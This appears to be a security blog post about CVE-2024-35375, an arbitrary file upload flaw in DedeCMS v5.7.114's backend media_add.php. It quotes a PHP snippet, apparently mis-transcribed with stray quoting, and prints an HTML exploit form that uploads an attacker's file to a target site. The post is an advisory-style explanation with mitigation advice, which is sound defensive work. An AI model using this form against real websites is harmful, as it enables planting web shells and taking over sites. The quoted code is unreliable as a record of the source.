Recently, a new vulnerability was discovered in DedeCMS v5.7.114, which is a famous web Content Management System (CMS) widely used to create and manage websites. The vulnerability, labeled as CVE-2024-35375, allows attackers to upload arbitrary files through the media add PHP page in the CMS backend.

This post will provide detailed information about the vulnerability, along with code snippets, links to original references, and potential exploits that attackers may use to exploit this vulnerability. As always, our purpose is to raise awareness about the potential risks associated with this vulnerability and help web administrators and developers protect their systems and applications.

Arbitrary File Upload Vulnerability (CVE-2024-35375)

The vulnerability exists on the media add PHP page in the backend of DedeCMS v5.7.114. The file upload mechanism does not properly validate the user input, allowing attackers to upload and execute arbitrary files, such as PHP scripts and malware, which may lead to unauthorized access, data breaches, website defacement, and other security issues.

The following code snippet shows the problematic part in /dede/media_add.php

if (!empty(${'_FILES'}["upfile1"]['tmp_name']))
{
    $ntime = time();
    $filename = "{$cfg_basedir}/uploads/".MyDate("Ymd",$ntime) . mt_rand(100,9999) . ".$ftype";
    @copy("${'_FILES'}["upfile1"]["tmp_name"], $filename);
}

From the code above, we can see that there is no proper validation of the file type (e.g., $ftype) before copying the uploaded file to the final destination. As a result, this opens the door for attackers to upload malicious files.

Exploit Details

An attacker can use various methods to exploit this vulnerability, from manually uploading a file using an HTML form to using automated tools that can perform multiple attempts to exploit the system. Here is an example of an HTML form that an attacker may use:

<!DOCTYPE html>
<html>
  <head>
    <title>DedeCMS Arbitrary File Upload Exploit</title>
  </head>
  <body>
    <form action="http://target_site/dede/media_add.php"; enctype="multipart/form-data" method="post">
      <input type="hidden" name="action" value="add">
      <input type="hidden" name="typeid" value="107">
      <label for="file">Select a file to upload:</label>
      <input type="file" id="file" name="upfile1">
      <input type="submit" value="Upload File">
    </form>
  </body>
</html>

The form displayed above sends a POST request to the vulnerable media_add.php file in the target DedeCMS installation. Providing an appropriate malicious file in the input field of the form and submitting the form would lead to successful exploitation of the vulnerability.

References

For more information about the vulnerability and its impact, along with the possible mitigation measures, please consult the following references:

1. DedeCMS official website
2. CVE-2024-35375 MITRE entry
3. NIST National Vulnerability Database
4. Issue report on the GitHub repository

Conclusion

In light of the seriousness of this arbitrary file upload vulnerability (CVE-2024-35375), it is vital for website administrators and developers to take proper actions to address this security risk by applying any available patches or updates provided by the developers of DedeCMS. Moreover, it is crucial to keep an eye on the latest security updates and follow best practices for securing web applications in order to avoid future vulnerabilities and potential exploits.

Timeline

Published on: 05/23/2024 19:16:01 UTC
Last modified on: 11/21/2024 15:15:30 UTC